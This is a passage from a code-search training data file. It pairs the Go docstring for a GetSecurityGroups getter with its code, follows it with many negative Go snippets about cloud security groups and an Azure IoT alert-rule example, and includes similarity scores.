0,\n\t\t//\"activeservicetypeid\": 0,\n\t\t//\"priority\": 0,\n\t\t\"lastupdatedtime\": timeNow,\n\t}\n\n\t// Update objects of fleet collection, with fleet type and driver id\n\tres, err := lc.locationService.SetObject(Object_Collection_Fleet, driverID, locationObj, fields)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// check if ok is false\n\tif res.Ok == false {\n\t\treturn nil, errors.New(res.Error)\n\t}\n\n\tlog.Printf(\"Driver location updated: %v\\n\", res.Ok)\n\treturn res, nil\n}", "func (r *User) SetRelationship(field string, rel interface{}) error {\n\treturn fmt.Errorf(\"kallax: model User has no relationships\")\n}", "func (s *GenerateTemplateOutput) SetS3Location(v *S3Location) *GenerateTemplateOutput {\n\ts.S3Location = v\n\treturn s\n}", "func (o PartnerRegionInfoOutput) Location() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v PartnerRegionInfo) *string { return v.Location }).(pulumi.StringPtrOutput)\n}", "func (o *Origin) SetOriginOSK(ctx context.Context, exec boil.ContextExecutor, insert bool, related ...*OriginSecretKey) error {\n\tquery := \"update \\\"origin_secret_keys\\\" set \\\"origin\\\" = null where \\\"origin\\\" = $1\"\n\tvalues := []interface{}{o.Name}\n\tif boil.DebugMode {\n\t\tfmt.Fprintln(boil.DebugWriter, query)\n\t\tfmt.Fprintln(boil.DebugWriter, values)\n\t}\n\n\t_, err := exec.ExecContext(ctx, query, values...)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"failed to remove relationships before set\")\n\t}\n\n\tif o.R != nil {\n\t\tfor _, rel := range o.R.OriginOSK {\n\t\t\tqueries.SetScanner(&rel.Origin, nil)\n\t\t\tif rel.R == nil {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\trel.R.OriginName = nil\n\t\t}\n\n\t\to.R.OriginOSK = nil\n\t}\n\treturn o.AddOriginOSK(ctx, exec, insert, related...)\n}" ]
[ "0.5952539", "0.58169675", "0.5627732", "0.5543721", "0.5478229", "0.5415209", "0.5406496", "0.53419703", "0.5322734", "0.5306378", "0.5295635", "0.52570945", "0.52078164", "0.5179327", "0.5162024", "0.515867", "0.5153171", "0.5133065", "0.5112879", "0.5101445", "0.5097648", "0.5060747", "0.50284165", "0.5027704", "0.50198334", "0.50103784", "0.49991193", "0.49588174", "0.49357653", "0.49352664", "0.49309865", "0.48979715", "0.48975697", "0.4850718", "0.4847053", "0.4841563", "0.4831637", "0.48087388", "0.47294435", "0.4718319", "0.47041586", "0.46927673", "0.467432", "0.46722767", "0.46665332", "0.4663738", "0.4625366", "0.46202925", "0.45992035", "0.45462498", "0.4534926", "0.4532177", "0.4523351", "0.45199043", "0.44698176", "0.44616187", "0.44575316", "0.43859744", "0.4375824", "0.43740144", "0.43719503", "0.4362183", "0.43536067", "0.43281177", "0.43238592", "0.43070924", "0.43038976", "0.42924386", "0.42912078", "0.42678195", "0.42574334", "0.42465368", "0.42428908", "0.42284164", "0.4226962", "0.42167965", "0.42102692", "0.42091292", "0.42037228", "0.41991493", "0.41936174", "0.4168978", "0.41670695", "0.41638857", "0.41544527", "0.41509527", "0.41507465", "0.41334122", "0.41212708", "0.41121072", "0.41068032", "0.41040474", "0.41025993", "0.40887707", "0.40886083", "0.4088553", "0.4079849", "0.40688705", "0.40671042", "0.40597528" ]
0.62475634
0
GetSecurityGroups returns the SecurityGroups field value if set, zero value otherwise (both if not set or set to explicit null).
func (o *CloudAwsVirtualMachineAllOf) GetSecurityGroups() []CloudAwsSecurityGroupRelationship { if o == nil { var ret []CloudAwsSecurityGroupRelationship return ret } return o.SecurityGroups }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (o *CreateLoadBalancerRequest) GetSecurityGroups() []string {\n\tif o == nil || o.SecurityGroups == nil {\n\t\tvar ret []string\n\t\treturn ret\n\t}\n\treturn *o.SecurityGroups\n}", "func (client *AwsClientWrapper) GetSecurityGroups(machine *clusterv1alpha1.Machine) ([]string, error) {\n\tinstance, err := getRunningInstance(machine, client.client)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tvar groups []string\n\tfor _, groupIdentifier := range instance.SecurityGroups {\n\t\tif *groupIdentifier.GroupName != \"\" {\n\t\t\tgroups = append(groups, *groupIdentifier.GroupName)\n\t\t}\n\t}\n\treturn groups, nil\n}", "func (o InstanceOutput) SecurityGroups() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v *Instance) pulumi.StringArrayOutput { return v.SecurityGroups }).(pulumi.StringArrayOutput)\n}", "func (o *CreateLoadBalancerRequest) GetSecurityGroupsOk() (*[]string, bool) {\n\tif o == nil || o.SecurityGroups == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SecurityGroups, true\n}", "func (r *LaunchConfiguration) SecurityGroups() pulumi.ArrayOutput {\n\treturn (pulumi.ArrayOutput)(r.s.State[\"securityGroups\"])\n}", "func (o *CloudAwsVirtualMachineAllOf) GetSecurityGroupsOk() ([]CloudAwsSecurityGroupRelationship, bool) {\n\tif o == nil || o.SecurityGroups == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SecurityGroups, true\n}", "func GetSecurityGroupInfo(sess *session.Session) (*ec2.DescribeSecurityGroupsOutput, error) {\n // snippet-start:[ec2.go.describe_security_groups.call]\n svc := ec2.New(sess)\n\n result, err := svc.DescribeSecurityGroups(nil)\n // snippet-end:[ec2.go.describe_security_groups.call]\n if err != nil {\n return nil, err\n }\n\n return result, nil\n}", "func (o *CreateLoadBalancerRequest) SetSecurityGroups(v []string) {\n\to.SecurityGroups = &v\n}", "func (stg *securityTestGroup) getSecurityGroups(agent string) ([]security.NetworkSecurityPolicy, error) {\n\tvar sgplist []security.NetworkSecurityPolicy\n\tstatus, err := stg.authAgentClient.Req(\"GET\", \"https://\"+agent+\":\"+globals.AgentProxyPort+\"/api/sgs/\", nil, &sgplist)\n\tif err != nil || status != http.StatusOK {\n\t\treturn nil, fmt.Errorf(\"Error getting SG Policies list: %v\", err)\n\t}\n\treturn sgplist, nil\n}", "func (o TopicRuleDestinationVpcConfigurationOutput) SecurityGroups() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v TopicRuleDestinationVpcConfiguration) []string { return v.SecurityGroups }).(pulumi.StringArrayOutput)\n}", "func (o *FiltersVmGroup) GetSecurityGroupIds() []string {\n\tif o == nil || o.SecurityGroupIds == nil {\n\t\tvar ret []string\n\t\treturn ret\n\t}\n\treturn *o.SecurityGroupIds\n}", "func (o *FiltersSecurityGroup) GetSecurityGroupIds() []string {\n\tif o == nil || o.SecurityGroupIds == nil {\n\t\tvar ret []string\n\t\treturn ret\n\t}\n\treturn *o.SecurityGroupIds\n}", "func (o TopicRuleDestinationVpcConfigurationPtrOutput) SecurityGroups() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v *TopicRuleDestinationVpcConfiguration) []string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.SecurityGroups\n\t}).(pulumi.StringArrayOutput)\n}", "func (s *DefaultSpaceSettings) SetSecurityGroups(v []*string) *DefaultSpaceSettings {\n\ts.SecurityGroups = v\n\treturn s\n}", "func (o *CloudAwsVirtualMachineAllOf) SetSecurityGroups(v []CloudAwsSecurityGroupRelationship) {\n\to.SecurityGroups = v\n}", "func (a *Client) GetPlatformSecurityGroups(params *GetPlatformSecurityGroupsParams) (*GetPlatformSecurityGroupsOK, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewGetPlatformSecurityGroupsParams()\n\t}\n\n\tresult, err := a.transport.Submit(&runtime.ClientOperation{\n\t\tID: \"getPlatformSecurityGroups\",\n\t\tMethod: \"GET\",\n\t\tPathPattern: \"/v1/platform_resources/security_groups\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"http\", \"https\"},\n\t\tParams: params,\n\t\tReader: &GetPlatformSecurityGroupsReader{formats: a.formats},\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn result.(*GetPlatformSecurityGroupsOK), nil\n\n}", "func (o *CloudAwsVirtualMachineAllOf) HasSecurityGroups() bool {\n\tif o != nil && o.SecurityGroups != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (instance *Host) ListSecurityGroups(ctx context.Context, state securitygroupstate.Enum) (list []*propertiesv1.SecurityGroupBond, ferr fail.Error) {\n\tdefer fail.OnPanic(&ferr)\n\n\tif valid.IsNil(instance) {\n\t\treturn nil, fail.InvalidInstanceError()\n\t}\n\n\t// instance.RLock()\n\t// defer instance.RUnlock()\n\n\txerr := instance.Inspect(ctx, func(_ data.Clonable, props *serialize.JSONProperties) fail.Error {\n\t\treturn props.Inspect(hostproperty.SecurityGroupsV1, func(clonable data.Clonable) fail.Error {\n\t\t\thsgV1, ok := clonable.(*propertiesv1.HostSecurityGroups)\n\t\t\tif !ok {\n\t\t\t\treturn fail.InconsistentError(\"'*propertiesv1.HostSecurityGroups' expected, '%s' provided\", reflect.TypeOf(clonable).String())\n\t\t\t}\n\n\t\t\tlist = FilterBondsByKind(hsgV1.ByID, state)\n\t\t\treturn nil\n\t\t})\n\t})\n\txerr = debug.InjectPlannedFail(xerr)\n\tif xerr != nil {\n\t\treturn nil, xerr\n\t}\n\n\treturn list, nil\n}", "func (c *Client) ListSecurityGroups(ctx context.Context, zone string) ([]*SecurityGroup, error) {\n\tlist := make([]*SecurityGroup, 0)\n\n\tresp, err := c.ListSecurityGroupsWithResponse(ctx)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif resp.JSON200.SecurityGroups != nil {\n\t\tfor i := range *resp.JSON200.SecurityGroups {\n\t\t\tsecurityGroup := securityGroupFromAPI(&(*resp.JSON200.SecurityGroups)[i])\n\t\t\tsecurityGroup.c = c\n\t\t\tsecurityGroup.zone = zone\n\n\t\t\tlist = append(list, securityGroup)\n\t\t}\n\t}\n\n\treturn list, nil\n}", "func (s *DescribeMountTargetSecurityGroupsOutput) SetSecurityGroups(v []*string) *DescribeMountTargetSecurityGroupsOutput {\n\ts.SecurityGroups = v\n\treturn s\n}", "func (a *Client) ListOpenstackSecurityGroups(params *ListOpenstackSecurityGroupsParams, authInfo runtime.ClientAuthInfoWriter, opts ...ClientOption) (*ListOpenstackSecurityGroupsOK, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewListOpenstackSecurityGroupsParams()\n\t}\n\top := &runtime.ClientOperation{\n\t\tID: \"listOpenstackSecurityGroups\",\n\t\tMethod: \"GET\",\n\t\tPathPattern: \"/api/v1/providers/openstack/securitygroups\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"https\"},\n\t\tParams: params,\n\t\tReader: &ListOpenstackSecurityGroupsReader{formats: a.formats},\n\t\tAuthInfo: authInfo,\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t}\n\tfor _, opt := range opts {\n\t\topt(op)\n\t}\n\n\tresult, err := a.transport.Submit(op)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tsuccess, ok := result.(*ListOpenstackSecurityGroupsOK)\n\tif ok {\n\t\treturn success, nil\n\t}\n\t// unexpected success response\n\tunexpectedSuccess := result.(*ListOpenstackSecurityGroupsDefault)\n\treturn nil, runtime.NewAPIError(\"unexpected success response: content available as default response in error\", unexpectedSuccess, unexpectedSuccess.Code())\n}", "func (s *DescribeNotebookInstanceOutput) SetSecurityGroups(v []*string) *DescribeNotebookInstanceOutput {\n\ts.SecurityGroups = v\n\treturn s\n}", "func (o *FiltersSecurityGroup) GetSecurityGroupNames() []string {\n\tif o == nil || o.SecurityGroupNames == nil {\n\t\tvar ret []string\n\t\treturn ret\n\t}\n\treturn *o.SecurityGroupNames\n}", "func ExampleRDS_DescribeDBSecurityGroups_shared00() {\n\tsvc := rds.New(session.New())\n\tinput := &rds.DescribeDBSecurityGroupsInput{\n\t\tDBSecurityGroupName: aws.String(\"mydbsecuritygroup\"),\n\t}\n\n\tresult, err := svc.DescribeDBSecurityGroups(input)\n\tif err != nil {\n\t\tif aerr, ok := err.(awserr.Error); ok {\n\t\t\tswitch aerr.Code() {\n\t\t\tcase rds.ErrCodeDBSecurityGroupNotFoundFault:\n\t\t\t\tfmt.Println(rds.ErrCodeDBSecurityGroupNotFoundFault, aerr.Error())\n\t\t\tdefault:\n\t\t\t\tfmt.Println(aerr.Error())\n\t\t\t}\n\t\t} else {\n\t\t\t// Print the error, cast err to awserr.Error to get the Code and\n\t\t\t// Message from an error.\n\t\t\tfmt.Println(err.Error())\n\t\t}\n\t\treturn\n\t}\n\n\tfmt.Println(result)\n}", "func (o *SecurityGroup) GetSecurityGroupId() string {\n\tif o == nil || o.SecurityGroupId == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.SecurityGroupId\n}", "func (s *HostListener) ListSecurityGroups(ctx context.Context, in *protocol.SecurityGroupHostBindRequest) (_ *protocol.SecurityGroupBondsResponse, err error) {\n\tdefer fail.OnExitConvertToGRPCStatus(&err)\n\tdefer fail.OnExitWrapError(&err, \"cannot disable security group on host\")\n\tdefer fail.OnPanic(&err)\n\n\tif s == nil {\n\t\treturn nil, fail.InvalidInstanceError()\n\t}\n\tif in == nil {\n\t\treturn nil, fail.InvalidParameterError(\"in\", \"cannot be nil\")\n\t}\n\tif ctx == nil {\n\t\treturn nil, fail.InvalidParameterError(\"ctx\", \"cannot be nil\")\n\t}\n\n\tif ok, err := govalidator.ValidateStruct(in); err == nil && !ok {\n\t\tlogrus.Warnf(\"Structure validation failure: %v\", in) // FIXME: Generate json tags in protobuf\n\t}\n\n\thostRef, hostRefLabel := srvutils.GetReference(in.GetHost())\n\tif hostRef == \"\" {\n\t\treturn nil, fail.InvalidRequestError(\"neither name nor id given as reference of Host\")\n\t}\n\n\tjob, xerr := PrepareJob(ctx, in.GetHost().GetTenantId(), fmt.Sprintf(\"/host/%s/securitygroups/list\", hostRef))\n\tif xerr != nil {\n\t\treturn nil, xerr\n\t}\n\tdefer job.Close()\n\n\ttracer := debug.NewTracer(job.Task(), tracing.ShouldTrace(\"listeners.host\"), \"(%s)\", hostRefLabel).WithStopwatch().Entering()\n\tdefer tracer.Exiting()\n\tdefer fail.OnExitLogError(&err, tracer.TraceMessage())\n\n\thostInstance, xerr := hostfactory.Load(job.Service(), hostRef)\n\tif xerr != nil {\n\t\treturn nil, xerr\n\t}\n\n\tdefer hostInstance.Released()\n\n\tbonds, xerr := hostInstance.ListSecurityGroups(securitygroupstate.All)\n\tif xerr != nil {\n\t\treturn nil, xerr\n\t}\n\n\tresp := converters.SecurityGroupBondsFromPropertyToProtocol(bonds, \"hosts\")\n\treturn resp, nil\n}", "func (s *SubnetListener) ListSecurityGroups(inctx context.Context, in *protocol.SecurityGroupSubnetBindRequest) (_ *protocol.SecurityGroupBondsResponse, err error) {\n\tdefer fail.OnExitConvertToGRPCStatus(inctx, &err)\n\tdefer fail.OnExitLogError(inctx, &err)\n\tdefer fail.OnExitWrapError(inctx, &err, \"cannot list Security Groups bound to Subnet\")\n\n\tif s == nil {\n\t\treturn nil, fail.InvalidInstanceError()\n\t}\n\tif in == nil {\n\t\treturn nil, fail.InvalidParameterError(\"in\", \"cannot be nil\")\n\t}\n\tif inctx == nil {\n\t\treturn nil, fail.InvalidParameterError(\"inctx\", \"cannot be nil\")\n\t}\n\n\tnetworkRef, _ := srvutils.GetReference(in.GetNetwork())\n\tsubnetRef, _ := srvutils.GetReference(in.GetSubnet())\n\tif subnetRef == \"\" {\n\t\treturn nil, fail.InvalidRequestError(\"neither name nor id given as reference for Subnet\")\n\t}\n\n\tjob, xerr := PrepareJob(inctx, in.GetNetwork().GetTenantId(), fmt.Sprintf(\"network/%s/subnet/%s/securitygroups/list\", networkRef, subnetRef))\n\tif xerr != nil {\n\t\treturn nil, xerr\n\t}\n\tdefer job.Close()\n\n\tstate := securitygroupstate.Enum(in.GetState())\n\n\thandler := handlers.NewSubnetHandler(job)\n\tbonds, xerr := handler.ListSecurityGroups(networkRef, subnetRef, state)\n\tif xerr != nil {\n\t\treturn nil, xerr\n\t}\n\n\tresp := converters.SecurityGroupBondsFromPropertyToProtocol(bonds, \"subnets\")\n\treturn resp, nil\n}", "func (s *ModifyMountTargetSecurityGroupsInput) SetSecurityGroups(v []*string) *ModifyMountTargetSecurityGroupsInput {\n\ts.SecurityGroups = v\n\treturn s\n}", "func (s *UserSettings) SetSecurityGroups(v []*string) *UserSettings {\n\ts.SecurityGroups = v\n\treturn s\n}", "func (m *MockSecurityGroupServiceIface) ListSecurityGroups(p *ListSecurityGroupsParams) (*ListSecurityGroupsResponse, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"ListSecurityGroups\", p)\n\tret0, _ := ret[0].(*ListSecurityGroupsResponse)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (o *CreateLoadBalancerRequest) HasSecurityGroups() bool {\n\tif o != nil && o.SecurityGroups != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func ExampleDeviceSecurityGroupsClient_Get() {\n\tcred, err := azidentity.NewDefaultAzureCredential(nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to obtain a credential: %v\", err)\n\t}\n\tctx := context.Background()\n\tclient, err := armsecurity.NewDeviceSecurityGroupsClient(cred, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to create client: %v\", err)\n\t}\n\tres, err := client.Get(ctx,\n\t\t\"subscriptions/20ff7fc3-e762-44dd-bd96-b71116dcdc23/resourceGroups/SampleRG/providers/Microsoft.Devices/iotHubs/sampleiothub\",\n\t\t\"samplesecuritygroup\",\n\t\tnil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to finish the request: %v\", err)\n\t}\n\t// TODO: use response item\n\t_ = res\n}", "func (a *Client) ListOpenstackSecurityGroupsNoCredentials(params *ListOpenstackSecurityGroupsNoCredentialsParams, authInfo runtime.ClientAuthInfoWriter, opts ...ClientOption) (*ListOpenstackSecurityGroupsNoCredentialsOK, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewListOpenstackSecurityGroupsNoCredentialsParams()\n\t}\n\top := &runtime.ClientOperation{\n\t\tID: \"listOpenstackSecurityGroupsNoCredentials\",\n\t\tMethod: \"GET\",\n\t\tPathPattern: \"/api/v1/projects/{project_id}/dc/{dc}/clusters/{cluster_id}/providers/openstack/securitygroups\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"https\"},\n\t\tParams: params,\n\t\tReader: &ListOpenstackSecurityGroupsNoCredentialsReader{formats: a.formats},\n\t\tAuthInfo: authInfo,\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t}\n\tfor _, opt := range opts {\n\t\topt(op)\n\t}\n\n\tresult, err := a.transport.Submit(op)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tsuccess, ok := result.(*ListOpenstackSecurityGroupsNoCredentialsOK)\n\tif ok {\n\t\treturn success, nil\n\t}\n\t// unexpected success response\n\tunexpectedSuccess := result.(*ListOpenstackSecurityGroupsNoCredentialsDefault)\n\treturn nil, runtime.NewAPIError(\"unexpected success response: content available as default response in error\", unexpectedSuccess, unexpectedSuccess.Code())\n}", "func (s *CreateMountTargetInput) SetSecurityGroups(v []*string) *CreateMountTargetInput {\n\ts.SecurityGroups = v\n\treturn s\n}", "func (m *MockClient) DescribeSecurityGroups(arg0 *ec2.DescribeSecurityGroupsInput) (*ec2.DescribeSecurityGroupsOutput, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"DescribeSecurityGroups\", arg0)\n\tret0, _ := ret[0].(*ec2.DescribeSecurityGroupsOutput)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (s *AwsVpcConfiguration) SetSecurityGroups(v []*string) *AwsVpcConfiguration {\n\ts.SecurityGroups = v\n\treturn s\n}", "func (o *FiltersVmGroup) GetSecurityGroupIdsOk() (*[]string, bool) {\n\tif o == nil || o.SecurityGroupIds == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SecurityGroupIds, true\n}", "func (o *FiltersSecurityGroup) GetSecurityGroupIdsOk() (*[]string, bool) {\n\tif o == nil || o.SecurityGroupIds == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SecurityGroupIds, true\n}", "func (c *Client) BindSecurityGroups(args *BindSecurityGroupsArgs) error {\n\tjsonBytes, jsonErr := json.Marshal(args)\n\tif jsonErr != nil {\n\t\treturn jsonErr\n\t}\n\tbody, err := bce.NewBodyFromBytes(jsonBytes)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn BindSecurityGroups(c, body)\n}", "func (o EciScalingConfigurationOutput) SecurityGroupId() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *EciScalingConfiguration) pulumi.StringPtrOutput { return v.SecurityGroupId }).(pulumi.StringPtrOutput)\n}", "func (o ClusterNodeAttributeOutput) SecurityGroupId() pulumi.StringOutput {\n\treturn o.ApplyT(func(v ClusterNodeAttribute) string { return v.SecurityGroupId }).(pulumi.StringOutput)\n}", "func ExampleDeviceSecurityGroupsClient_Get() {\n\tcred, err := azidentity.NewDefaultAzureCredential(nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to obtain a credential: %v\", err)\n\t}\n\tctx := context.Background()\n\tclientFactory, err := armsecurity.NewClientFactory(\"<subscription-id>\", cred, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to create client: %v\", err)\n\t}\n\tres, err := clientFactory.NewDeviceSecurityGroupsClient().Get(ctx, \"subscriptions/20ff7fc3-e762-44dd-bd96-b71116dcdc23/resourceGroups/SampleRG/providers/Microsoft.Devices/iotHubs/sampleiothub\", \"samplesecuritygroup\", nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to finish the request: %v\", err)\n\t}\n\t// You could use response here. We use blank identifier for just demo purposes.\n\t_ = res\n\t// If the HTTP response code is 200 as defined in example definition, your response structure would look as follows. Please pay attention that all the values in the output are fake values for just demo purposes.\n\t// res.DeviceSecurityGroup = armsecurity.DeviceSecurityGroup{\n\t// \tName: to.Ptr(\"samplesecuritygroup\"),\n\t// \tType: to.Ptr(\"Microsoft.Security/deviceSecurityGroups\"),\n\t// \tID: to.Ptr(\"/subscriptions/20ff7fc3-e762-44dd-bd96-b71116dcdc23/resourceGroups/SampleRG/providers/Microsoft.Devices/iotHubs/sampleiothub/providers/Microsoft.Security/deviceSecurityGroups/samplesecuritygroup\"),\n\t// \tProperties: &armsecurity.DeviceSecurityGroupProperties{\n\t// \t\tAllowlistRules: []armsecurity.AllowlistCustomAlertRuleClassification{\n\t// \t\t\t&armsecurity.ConnectionToIPNotAllowed{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when an outbound connection is created between your device and an ip that isn't allowed\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Outbound connection to an ip that isn't allowed\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"ConnectionToIpNotAllowed\"),\n\t// \t\t\t\tValueType: to.Ptr(armsecurity.ValueTypeIPCidr),\n\t// \t\t\t\tAllowlistValues: []*string{\n\t// \t\t\t\t},\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.LocalUserNotAllowed{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when a local user that isn't allowed logins to the device\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Login by a local user that isn't allowed\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"LocalUserNotAllowed\"),\n\t// \t\t\t\tValueType: to.Ptr(armsecurity.ValueTypeString),\n\t// \t\t\t\tAllowlistValues: []*string{\n\t// \t\t\t\t},\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.ProcessNotAllowed{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when a process that isn't allowed is executed\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Execution of a process that isn't allowed\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"ProcessNotAllowed\"),\n\t// \t\t\t\tValueType: to.Ptr(armsecurity.ValueTypeString),\n\t// \t\t\t\tAllowlistValues: []*string{\n\t// \t\t\t\t},\n\t// \t\t}},\n\t// \t\tDenylistRules: []*armsecurity.DenylistCustomAlertRule{\n\t// \t\t},\n\t// \t\tThresholdRules: []armsecurity.ThresholdCustomAlertRuleClassification{\n\t// \t\t},\n\t// \t\tTimeWindowRules: []armsecurity.TimeWindowCustomAlertRuleClassification{\n\t// \t\t\t&armsecurity.ActiveConnectionsNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of active connections of a device in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of active connections is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"ActiveConnectionsNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.AmqpC2DMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of cloud to device messages (AMQP protocol) in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of cloud to device messages (AMQP protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"AmqpC2DMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.MqttC2DMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of cloud to device messages (MQTT protocol) in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of cloud to device messages (MQTT protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"MqttC2DMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.HTTPC2DMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of cloud to device messages (HTTP protocol) in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of cloud to device messages (HTTP protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"HttpC2DMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.AmqpC2DRejectedMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of cloud to device messages (AMQP protocol) that were rejected by the device in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of rejected cloud to device messages (AMQP protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"AmqpC2DRejectedMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.MqttC2DRejectedMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of cloud to device messages (MQTT protocol) that were rejected by the device in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of rejected cloud to device messages (MQTT protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"MqttC2DRejectedMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.HTTPC2DRejectedMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of cloud to device messages (HTTP protocol) that were rejected by the device in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of rejected cloud to device messages (HTTP protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"HttpC2DRejectedMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: 